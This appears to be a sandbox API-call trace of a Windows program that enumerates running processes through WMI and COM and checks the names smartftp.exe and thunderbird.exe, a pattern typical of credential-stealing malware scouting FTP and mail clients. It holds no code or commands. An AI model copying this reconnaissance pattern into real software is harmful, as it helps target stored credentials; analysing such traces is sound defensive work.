[0225.530] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2312\"") returned 0x66 [0225.530] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.530] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.530] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.530] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.531] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5ebb1b0) returned 0x0 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ebb1b0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.532] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5ebb1b0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2768) returned 0x0 [0225.532] WbemDefPath:IUnknown:Release (This=0x5ebb1b0) returned 0x0 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2768) returned 0x0 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.532] WbemDefPath:IUnknown:AddRef (This=0x5ec2768) returned 0x3 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5ebb1c0) returned 0x0 [0225.532] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5ebb1c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.532] WbemDefPath:IUnknown:Release (This=0x5ebb1c0) returned 0x3 [0225.532] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.532] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.533] WbemDefPath:IUnknown:Release (This=0x5ec2768) returned 0x2 [0225.533] WbemDefPath:IUnknown:Release (This=0x5ec2768) returned 0x1 [0225.533] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.533] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2768, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2768) returned 0x0 [0225.533] WbemDefPath:IUnknown:AddRef (This=0x5ec2768) returned 0x3 [0225.533] WbemDefPath:IUnknown:Release (This=0x5ec2768) returned 0x2 [0225.533] WbemDefPath:IWbemPath:SetText (This=0x5ec2768, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2312\"") returned 0x0 [0225.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.533] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.533] IWbemClassObject:Get (in: This=0x5ebc9e8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f6c8c*=0, plFlavor=0x26f6c90*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x26f6c8c*=8, plFlavor=0x26f6c90*=0) returned 0x0 [0225.533] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0225.533] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0225.533] IWbemClassObject:Get (in: This=0x5ebc9e8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f6c8c*=8, plFlavor=0x26f6c90*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x26f6c8c*=8, plFlavor=0x26f6c90*=0) returned 0x0 [0225.533] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0225.533] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0225.534] CoTaskMemAlloc (cb=0x4) returned 0x5eca588 [0225.534] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca588, puReturned=0x26dde18 | out: apObjects=0x5eca588*=0x5ebcb80, puReturned=0x26dde18*=0x1) returned 0x0 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebcb80) returned 0x0 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.535] IUnknown:AddRef (This=0x5ebcb80) returned 0x3 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebcb84) returned 0x0 [0225.535] IMarshal:GetUnmarshalClass (in: This=0x5ebcb84, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.535] IUnknown:Release (This=0x5ebcb84) returned 0x3 [0225.535] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.535] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.535] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.535] IUnknown:Release (This=0x5ebcb80) returned 0x2 [0225.535] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.535] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.536] IUnknown:QueryInterface (in: This=0x5ebcb80, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebcb80) returned 0x0 [0225.536] IUnknown:AddRef (This=0x5ebcb80) returned 0x4 [0225.536] IUnknown:Release (This=0x5ebcb80) returned 0x3 [0225.536] IUnknown:Release (This=0x5ebcb80) returned 0x2 [0225.536] CoTaskMemFree (pv=0x5eca588) [0225.536] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.536] IUnknown:AddRef (This=0x5ebcb80) returned 0x3 [0225.536] IWbemClassObject:Get (in: This=0x5ebcb80, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.536] IWbemClassObject:Get (in: This=0x5ebcb80, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2320\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.536] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2320\"") returned 0x66 [0225.536] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2320\"") returned 0x66 [0225.537] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.537] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.537] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.537] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.537] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca588) returned 0x0 [0225.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca588, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.538] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca588, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec2848) returned 0x0 [0225.538] WbemDefPath:IUnknown:Release (This=0x5eca588) returned 0x0 [0225.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec2848) returned 0x0 [0225.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.538] WbemDefPath:IUnknown:AddRef (This=0x5ec2848) returned 0x3 [0225.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.538] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca598) returned 0x0 [0225.538] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca598, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.538] WbemDefPath:IUnknown:Release (This=0x5eca598) returned 0x3 [0225.538] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.539] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.539] WbemDefPath:IUnknown:Release (This=0x5ec2848) returned 0x2 [0225.539] WbemDefPath:IUnknown:Release (This=0x5ec2848) returned 0x1 [0225.539] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.539] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.539] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec2848, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec2848) returned 0x0 [0225.539] WbemDefPath:IUnknown:AddRef (This=0x5ec2848) returned 0x3 [0225.539] WbemDefPath:IUnknown:Release (This=0x5ec2848) returned 0x2 [0225.539] WbemDefPath:IWbemPath:SetText (This=0x5ec2848, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2320\"") returned 0x0 [0225.539] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.539] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.539] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.539] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.539] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.539] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.539] IWbemClassObject:Get (in: This=0x5ebcb80, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f7500*=0, plFlavor=0x26f7504*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x26f7500*=8, plFlavor=0x26f7504*=0) returned 0x0 [0225.539] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0225.539] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0225.539] IWbemClassObject:Get (in: This=0x5ebcb80, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26f7500*=8, plFlavor=0x26f7504*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x26f7500*=8, plFlavor=0x26f7504*=0) returned 0x0 [0225.539] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0225.539] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0225.539] CoTaskMemAlloc (cb=0x4) returned 0x5eca5c8 [0225.540] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca5c8, puReturned=0x26dde18 | out: apObjects=0x5eca5c8*=0x5ebcd18, puReturned=0x26dde18*=0x1) returned 0x0 [0225.540] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ebcd18) returned 0x0 [0225.540] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.541] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.541] IUnknown:AddRef (This=0x5ebcd18) returned 0x3 [0225.541] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.541] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.541] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ebcd1c) returned 0x0 [0225.541] IMarshal:GetUnmarshalClass (in: This=0x5ebcd1c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.541] IUnknown:Release (This=0x5ebcd1c) returned 0x3 [0225.541] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.541] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.541] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.541] IUnknown:Release (This=0x5ebcd18) returned 0x2 [0225.541] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.541] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.541] IUnknown:QueryInterface (in: This=0x5ebcd18, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ebcd18) returned 0x0 [0225.541] IUnknown:AddRef (This=0x5ebcd18) returned 0x4 [0225.541] 